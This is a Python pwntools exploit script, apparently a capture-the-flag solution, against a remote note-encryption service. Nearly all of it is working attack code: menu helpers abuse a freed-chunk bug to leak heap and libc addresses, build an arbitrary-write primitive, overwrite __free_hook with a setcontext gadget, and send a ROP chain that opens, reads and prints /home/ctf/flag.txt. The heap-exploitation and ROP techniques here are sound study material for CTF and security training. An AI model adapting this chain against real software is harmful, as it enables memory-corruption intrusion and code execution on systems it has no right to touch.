#!/usr/bin/python3 | |
from pwn import * | |
from past.builtins import xrange | |
from time import sleep | |
from binascii import hexlify, unhexlify | |
import subprocess | |
import random | |
# Utils | |
def Encrypt(index, note=None, data=None):
    """Drive menu option 1 ("Encrypt") on the module-level ``io`` connection.

    Sends ``index`` (formatted as text, newline-terminated) after the
    'Index: ' prompt, then ``note`` and ``data`` raw -- no trailing newline --
    after the 'Note: ' and 'Text: ' prompts.  The ``None`` defaults are not
    sendable payloads; every caller in this file passes both values.
    """
    conn = io
    conn.sendlineafter('> ', '1')
    conn.sendlineafter('Index: ', '{}'.format(index))
    for prompt, payload in (('Note: ', note), ('Text: ', data)):
        conn.sendafter(prompt, payload)
def Decrypt(index):
    """Drive menu option 2 ("Decrypt") for ``index`` on the module-level ``io``.

    Only the two prompts are answered here; whatever the service prints back
    is left on the connection for the caller to read.
    """
    for prompt, payload in (('> ', '2'), ('Index: ', '{}'.format(index))):
        io.sendlineafter(prompt, payload)
def Edit(index, newnote=None, newdata=None):
    """Drive menu option 3 ("Edit") on the module-level ``io`` connection.

    Sends ``index`` newline-terminated after 'Index: ', then ``newnote`` and
    ``newdata`` raw after the 'New note: ' and 'New text: ' prompts.  As with
    ``Encrypt``, the ``None`` defaults are placeholders only.
    """
    conn = io
    conn.sendlineafter('> ', '3')
    conn.sendlineafter('Index: ', '{}'.format(index))
    for prompt, payload in (('New note: ', newnote), ('New text: ', newdata)):
        conn.sendafter(prompt, payload)
def Delete(index):
    """Drive menu option 4 ("Delete") for ``index`` on the module-level ``io``."""
    for prompt, payload in (('> ', '4'), ('Index: ', '{}'.format(index))):
        io.sendlineafter(prompt, payload)
def Arbwrite(what, where, heap_base):
    """Store the 8-byte value ``what`` at address ``where`` via the menu.

    The sequence below is order-sensitive: two Encrypt calls, two Deletes,
    an Edit of index 0 whose note is ``p64(heap_base + 0xe80)``, two more
    Encrypts (the second with ``p64(where)`` as the note), and a final Edit
    of index 2 carrying ``p64(what)``.  Indices 0, 1 and 2 are therefore
    clobbered on every call; ``heap_base`` is only used to form the
    ``+0xe80`` note.  All offsets are specific to the build this script
    was written against.
    """
    Encrypt(0, note='A', data='A')
    Encrypt(1, note='A', data='A')
    Delete(1)
    Delete(0)
    Edit(0, newnote=p64(heap_base+0xe80), newdata='A')
    Encrypt(0, 'A', 'A')
    Encrypt(0, note=p64(where), data='A')
    Edit(2, newnote=p64(what), newdata='A')
# Addr | |
# libc-relative offsets.  They belong to one specific libc build (not
# identified in this file) and are reproduced as given; a different libc
# would need all of them redone.
libc_leak_offset = 0x1ecf60  # subtracted from the leaked pointer in Hack() to get libc_base
__free_hook = 0x1eeb28       # write target of the last Arbwrite in Hack()
setcontext = 0x580a0         # Hack() uses libc_base + setcontext + 61
# Gadgets (libc-relative)
L_SYSCALL = 0x000e7559
L_POP_RDI = 0x0015b427
L_POP_RSI = 0x0014d1da
L_POP_RDX = 0x00162866  # pop rdx ; pop xxx ; ret -- two qwords follow it in L_ROP
L_POP_RAX = 0x00112cfb
# Hack | |
def Hack():
    """Run the full interaction against the service on the module-level ``io``.

    As written the flow is: three Encrypt calls; Delete(0) then Decrypt(0),
    whose reply after '): ' is read as a hex string, unhexlified and unpacked
    as a heap pointer (``heap_base`` = that value - 0xf00); an Edit and two
    Encrypts; Decrypt(2), parsed the same way and converted with
    ``libc_leak_offset``; one more Encrypt; a run of Arbwrite calls; then
    Delete(5) and a single send of ``L_ROP``.  Every constant here is tied to
    the exact binary/libc this was written for.
    """
    global io
    Encrypt(0, note='A'*0x8, data='A'*0x8)  # 0
    Encrypt(1, note='A'*0x8, data='B'*0x8)  # 1
    Encrypt(2, note='B'*0x8, data='C'*0x8)  # 2
    Delete(0)
    Decrypt(0)
    io.recvuntil('): ')
    # reply is hex text; 0xf00 is the assumed distance from the heap base
    heap_base = u64(unhexlify(io.recvline().strip()))-0xf00
    print(hex(heap_base))
    # newdata is '\n' here, unlike the 'A' used elsewhere
    Edit(0, newnote=p64(heap_base+0xe80), newdata='\n')
    Encrypt(0, note='A'*0x8, data='A')
    Encrypt(3, note=p64(heap_base+0x650), data='A')
    Decrypt(2)
    io.recvuntil('): ')
    libc_leak = u64(unhexlify(io.recvline().strip()))
    libc_base = libc_leak - libc_leak_offset
    print(hex(libc_base))
    Encrypt(5, 'A', 'A')  # heap base + 0x1130
    # 0x00154930: mov rdx, qword [rdi+0x08] ; mov qword [rsp], rax ; call qword [rdx+0x20] ; (1 found)
    Arbwrite(what=heap_base+0x1168, where=heap_base+0x1178, heap_base=heap_base)
    Arbwrite(what=libc_base+setcontext+61, where=heap_base+0x1188, heap_base=heap_base)
    Arbwrite(what=heap_base+0x2000, where=heap_base+0x1168+0xa0, heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RDI, where=heap_base+0x1160+0xb0, heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RDI, where=heap_base+0x2000+0x8, heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RSI, where=heap_base+0x2000+0x18, heap_base=heap_base)
    Arbwrite(what=heap_base+0x2000, where=heap_base+0x2000+0x20, heap_base=heap_base)
    Arbwrite(what=libc_base+L_POP_RDX, where=heap_base+0x2000+0x28, heap_base=heap_base)
    Arbwrite(what=0x1000, where=heap_base+0x2000+0x30, heap_base=heap_base)
    Arbwrite(what=0x1000, where=heap_base+0x2000+0x38, heap_base=heap_base)
    Arbwrite(what=libc_base+L_SYSCALL, where=heap_base+0x2000+0x40, heap_base=heap_base)
    Arbwrite(what=libc_base+0x154930, where=libc_base+__free_hook, heap_base=heap_base)
    Delete(5)
    # path string padded to 0x48 bytes, followed by the qword sequence sent as one write
    L_ROP = b'/home/ctf/flag.txt\0'.ljust(0x48, b'\0')+\
        p64(libc_base+L_POP_RDI)+p64(heap_base+0x2000)+\
        p64(libc_base+L_POP_RSI)+p64(0)+\
        p64(libc_base+L_POP_RDX)+p64(0x100)+p64(0)+\
        p64(libc_base+L_POP_RAX)+p64(0x2)+\
        p64(libc_base+L_SYSCALL)+\
        p64(libc_base+L_POP_RDI)+p64(3)+\
        p64(libc_base+L_POP_RSI)+p64(heap_base)+\
        p64(libc_base+L_POP_RAX)+p64(0)+\
        p64(libc_base+L_SYSCALL)+\
        p64(libc_base+L_POP_RAX)+p64(1)+\
        p64(libc_base+L_POP_RDI)+p64(1)+\
        p64(libc_base+L_SYSCALL)
    io.send(L_ROP)
# Pwn | |
if __name__ == '__main__':
    # Entry point: ``io`` is the module-level connection every helper above uses.
    # io = process('./chall')  # local target, left disabled by the author
    io = remote('challs.xmas.htsp.ro', 2007)  # hard-coded remote target
    Hack()
    io.interactive()